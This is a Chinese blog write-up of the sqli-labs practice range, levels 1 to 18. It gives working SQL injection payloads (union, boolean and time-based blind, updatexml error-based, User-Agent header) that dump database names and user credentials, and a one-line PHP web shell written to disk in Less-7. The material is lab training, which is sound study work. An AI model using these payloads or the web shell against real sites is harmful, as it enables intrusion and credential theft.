sql注入靶场通关

最新推荐文章于 2024-08-14 15:33:15 发布

xiaoyang0475

最新推荐文章于 2024-08-14 15:33:15 发布

阅读量963

点赞数 18

文章标签： sql 数据库

本文链接：https://blog.csdn.net/xiaoyang0475/article/details/140125870

版权

打开小皮，并打开Apache2.4.39 和 MySQL5.7.26

打开网站创建网络域名为sqli-labs 端口为8989 PHP版本5.3.29 根目录与WWW文件在同一路径，进行创建。

打开创建好的网站

打开网站就可以进行sqli-labs靶场通关啦

sql靶场通关秘籍

接下来让我们开始进行打靶吧！

Less-1

GET-Error based-Single quotes-String(基于错误的 GET 单引号字符型注入)

Less-1 **Error Based- String**

输入正常数据查看回显

通过判断是否存在注入点和注入类型来进行打靶

判断注入点 ?id=1查看是否存在注入点

确定存在注入点

将后面进行注释查看页面回显

页面回显正常判断注入方式为字符型注入

输入order by 来判断此列表有几列

当输入order by 3--+时显示正常

当输入order by 4--+时显示

表示4不在列数范围内，表明列表存在3列有效列

输入?id=-1'union select 1,2,3--+进行联合查询

输入?id=99' UNION SELECT 1,database(),3 --+进行爆表查询

接下来开始爆表名，在 information_schema.table 进行查询，使用 group_concat() 函数合并查询结果

?id=99' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

接下来爆 users 表的字段，在 information_schema.columns 爆出来

?id=99' union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+

爆出 users 表中的信息，这个表有用户名和密码这种敏感信息

?id=99' UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+

PHP 文件 SQL 语句代码源码

$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result = mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo ""; echo 'Your Login name:'. $row['username']; echo " "; echo 'Your Password:' .$row['password']; echo ""; } else { echo ''; print_r(mysql_error()); echo ""; }

Less-2

GET-Error based-Intiger based (基于错误的 GET 整型注入)

Less-2 **Error Based- Intiger**

输入?id=1查看回显

输入id=1'判断注入类型

id=1'报错再尝试id=1"

依旧错误,将'和"去掉

回显正确，表明为数字型注入

输入?id=1 order by 4--+

显示4不在范围

输入?id=3 order by 3--+ 显示列表的列数为3

输入 ?id=99 UNION SELECT 1,2,3--+

数据库爆名 ?id=99 UNION SELECT 1,database(),3 --+

爆表名：?id=99 UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

爆user表：?id=99 union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+

爆user表的信息：?id=99 UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+

PHP 文件源码 SQL 语句

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo ""; echo 'Your Login name:'. $row['username']; echo " "; echo 'Your Password:' .$row['password']; echo ""; } else { echo ''; print_r(mysql_error()); echo ""; }

Less-3

GET-Error based-Single quotes with twist string (基于错误的 GET 单引号变形字符型注入)

Less-3 Error Based- String (with Twist)

输入?id=1查看正常界面

输入?id=1'闭合查看回显判断是否有注入点

报错说明有注入点但是闭合方式不对，换成?id=1"

回显正常说明注入方式为字符型注入

使用以下命令去查询
?id=2')--+
?id=1') order by 3--+
?id=-1') union select 1,2,3--+
?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

PHP 源码文件 SQL 语句

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo ""; echo 'Your Login name:'. $row['username']; echo " "; echo 'Your Password:' .$row['password']; echo ""; } else { echo ''; print_r(mysql_error()); echo ""; }

Less-4

输入?id=1判断注入点和注入方式

?id=1

?id=1' 网页也回显正常的信息

注入双引号闭合，MySQL 语句报错，说明存在注入漏洞，并且闭合符号是双引号+括号

将后面内容注释下，回显正确

数据信息获取方式可以参考第一关，除闭合方式外其余一致。

Fess-5

输入?id=1判断是否有注入点和注入类型

发现提示为You are in......

输入?id=1',提示错误

输入?id=1",提示You are in......

判断此为盲注类型

闭合方式：?id=1'
加上--+，注释掉后面的 SQL 语句

获取数据库信息
接下来判断表有几列，使用 ORDER BY 子句进行一个排序，看一下对几列有效。

?id=1' orderby 3--+ you are in ...

?id=1' order by 4--+ 报错信息即存在三列信息

使用 length() 函数结合回显信息判断数据库长度，多次尝试测试长度为8

?id=1' and length((select database()))=8 --+

获取数据库名，此处不适用 UNION 联合查询（因为当 id 为一个查不到的参数时，页面无显示。即因为是布尔注入）。我们使用 left() 函数，left(string, num) 函数返回字符串 string 最左边的 num 个字符串。

我们首先使用 left() 函数判断数据库名的第一位是否是字符 a。注入之后无回显，说明数据库名第一位不是 a

?id = 1' and left((select database()),1)='a' --+经过多次测试，第一位为s

?id = 1' and left((select database()),1)='a' --+

从a到z慢慢试最后得到

?id=1' AND LEFT((SELECT database()), 8)='security' --+

Less-6

判断是否存在注入点和注入类型

输入?id=1’

输入?id=1",出现报错

说明存在注入点闭合方式为",其余查询命令可以参考第五关命令。

Less-7

通过sql注入写一句话木马病毒。

通过修改 MySQL 下的 my.ini 配置文件就可以启用权限，需要把下面这个字符串写入文件中。

secure_file_priv="/"

判断闭合方式为?id=1'))

我们需要先知道网页所在的文件路径，从该题中的无法得到的，我们去 Less-1 题，在那获取文件路径。这种操作也可以应用在实践中，可以同时利用同一 Web 中的多个注入点。

使用 UNION 联合查询来注入参数，注意此处存在转义问题，所有的“\”都要双写

?id=1' UNION SELECT 1,2,'<?php @eval($_POST["123456"]);?>' into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\text.php"--+

使用蚁剑连接，记得 url 要加上我们传入的 text.php。

Less-8

判断闭合方式
首先注入正确的参数，网页返回 “You are in...”，但是没有其他信息。

?id=1

然后注入一个查不到的参数，网页没有任何反应。说明向这个网页传入参数是用于判断 id 值是否存在，如果存在则返回信息

?id=9999

判断是否有 SQL 注入漏洞，注入个单引号进行闭合，网页无任何返回

?id=1'

此时还是注入单引号，但是后面注释掉，网页返回“You are in ...”。

这说明网页存在 SQL 注入漏洞，并且是用单引号字符型注入。同时因为 SQL 语句发生错误，因此此处是 bool 盲注漏洞

闭合方式：?id=1'--+

Less-9

首先注入正确的参数，网页返回 “You are in...”，但是没有其他信息。

首先注入正确的参数，网页返回“You are in ...”，但是没有其他信息

?id=1

接下来注入个查不到的参数，网页还是返回“You are in ...” ?id=9999

注入个单引号进行闭合，网页还是返回“You are in ...” ?id=1'

再尝试下面三种方式：网页仍然是“You are in ...”

?id=1' --+

?id=1"

?id=1" --+

我们转换思路，MySQL 的 sleep() 函数能够起到休眠的作用。为了方便调试，我们使用 Burp 拦截工具中的重放器

?id=1 and sleep(1) --+ 使用 Burp 工具开启拦截，并注入，发送都重放器，发送并观察时间

然后在网页中再次尝试

明显响应时间变长，这是明显的基于时间盲注的字符型 SQL 注入漏洞，我们需要使用 sleep() 函数制造时间差来进行注入。有时间延迟说明注入的

闭合方式：id = 1' and sleep(10) --+
获取数据库信息
注入流程与 Less-5 类似，不过这里的判断标准不是回显的信息，而是响应时间。MySQL 的 IF 语句允许根据表达式的某个条件或结果来执行一组 SQL 语句，语法如下，当表达式 expr 为真时返回 value1 的值，否则返回 value2

if(expr,value1,value2)

通过二分法测试，最终确定数据库长度为 8

?id=1' and if(length(database())=8,sleep(10),1) --+

使用穷举法进行测试，得到数据库名的第一个字符为 "s"

?id=1' and if(left((select database()),1)='s' ,sleep(10),1) --+

最终得到数据库名字为“security”

均通过响应时间来确定

接下来使用类似的方法，爆出表明、字段名和其他信息

Less-10

与第9关类似，属于通过时间盲注，只是闭合方式不同

闭合方式：id=1" and sleep(10) --+

获取数据库信息与第9关闭合方式不同，其余一样

Less-11

使用Username : admin Password : admin 进行正常登陆

接下来直接在 “Username” 中直接注入单引号，网页返回报错信息，说明存在 Sql 注入。

使用万能密码进行登陆查看闭合方式

闭合方式： ' or 1 = 1#

通过使用以下sql语句进行获取数据库信息

username: ' or 1=1 order by 3 #

username: ' or 1=1 order by 2 #

' UNION SELECT database(),1#

' union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security' #

' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' #

' union select 1,group_concat(concat_ws(';',username,password)) from security.users #

Less-12

查看注入方式和寻找注入点

a' or1 = 1#

注入以下的内容，统统都显示登录失败且无回显。

a') or 1 = 1#

a')) or 1 = 1#

使用双引号闭合，出现报错，

a " or 1=1

经过测试得知为a ") or 1=1

数据获取方式与11关类似，只是换成")即可。

Less-13

使用' or 1=1 #测试是否有注入点和注入类型

使用 ')or 1=1 进行测试

获取数据库信息

') or 1=1 or length((select database()))=8#

') or 1=1 or left((select database()),1)='s'#

使用类似的语句继续爆下面的信息。

Less-14

使用'or 1=1#查看什么闭合方式

发现使用" or 1=1 时回馈正确

Less-15

使用'or 1=1#查看什么闭合方式

以此使用双引号，加括号的方式，均没有回馈信息

当你注入完整的注入信息时，发现 ' or 1=1 # 是成功登陆界面，在此登陆界面只能通过成功与失败进行，可用使用布尔盲注或者时间盲注都行。

确认闭合方式为 ' or 1=1 #

获取信息可以使用布尔盲注，可以参考第九关除闭合方式不一样，语句类似

Less-16

使用15关的思路，与15关大同小异，只是闭合方式不同，通过测试发现

") or 1 = 1# 获取数据库信息和15关闭合方式不同，其余流程相同

Less-17

本关卡有两个 SQL 语句，其中一个进行了强效的过滤，我们需要发现第二个注入点。同时本关卡可以使用报错注入进行攻击

判断闭合方式
我们先按照网页的功能走一遍，目测是更改密码的页面，输入用户名之后用新密码覆盖旧密码

去第11关尝试，发现登陆成功，说明密码修改完成

使用单引号闭合构造恒真条件，网页回显密码修改失败。

a' OR 1 = 1#

测试一下所有的注入，发现这些注入网页都回显改密失败。

a') OR 1 = 1#

a')) OR 1 = 1#

a" OR 1 = 1# a") OR 1 = 1#

a")) OR 1 = 1#

我们切换下思路，之前我们的用户名字段都是空字符，现在我们写上一个已知的用户名 admin 再次注入。

uname=admin

passwd=' 出现报错信息

闭合方式：
uname=admin

passwd=' or 1=1 #

网页回显改密码成功，并且报了一个语法错误，说明 passwd 使用单引号进行闭合。同时我们可以推测这个关卡有 2 次查询，第一次是根据 uname 参数进行查询，判断要改密码的用户是否存在。第二次查询时根据要改密码的用户，把 passwd 参数覆盖原密码，这里在第二次查询有注入点。

updatexml() 报错注入
我们将使用 updatexml() 报错注入，该函数用于改变 XML 文档中符合条件的节点的值。函数原型为：

UPDATEXML (XML_document, XPath_string, new_value);

参数说明
XML_document String，XML 文档对象的名称
XPath_string Xpath 格式的字符串
new_value String，用于替换查找到的符合条件的数据

其中参数 XPath_string 需要是“/xxx/xxx/...”的格式，进行查询时将会按照这个参数进行操作。注意：如果 XPath_string 是一个错误的路径，但是该路径符合参数规范，就不会报错。反之，参数不符合规范，则会触发报错，我们就是利用这个，通过 updatexml() 函数的报错回显我们需要的信息。

获取数据库信息
利用 updatexml() 函数获取下当前使用的 MySQL版本

' OR updatexml(1,concat("!",version()),2)#

获取数据库名：

uname=admin

password=' OR updatexml(1,concat("!",version()),2)#爆破表名：

uname=admin

passwd=' OR updatexml(1,concat("!",(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security')),2)#爆破字段名：

uname=admin

password=' OR updatexml(1,concat("!",(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'security' AND table_name = 'users')),2) or'

爆破账号密码：

uname=admin

Less-18

判断闭合方式

注入正确的用户名和密码，观察到网页回显

注入个错误的用户名和密码，网页显示登录失败回显

Username:admin

Password:a

使用引号，双引号，括号的方式闭合，发现均为报错

登录成功时，User Agent 会回显， User Agent 头可能会存在注入

使用 brup 抓包

Ctrl +R 发送到 Repeater

修改 User-Agent 字段，添加一个引号，发现报错信息

闭合方式：User-Agent：' '

获取数据库信息

在注入的两个单引号之间可以插入其他 Sql 语句，我们在这里放置 updatexml() 报错注入语句。注意使用单引号闭合两侧的 Sql 语句时，相当于把它分割成了 2 部分，插入 updatexml() 报错时要用 or进行连接。

爆破数据库：' or updatexml(1,concat("!",database()),2)or '

爆破表名：' or updatexml(1,concat("!",(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security')),2) or'

爆破字段名：' or updatexml(1,concat("!",(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'security' AND table_name = 'users')),2) or'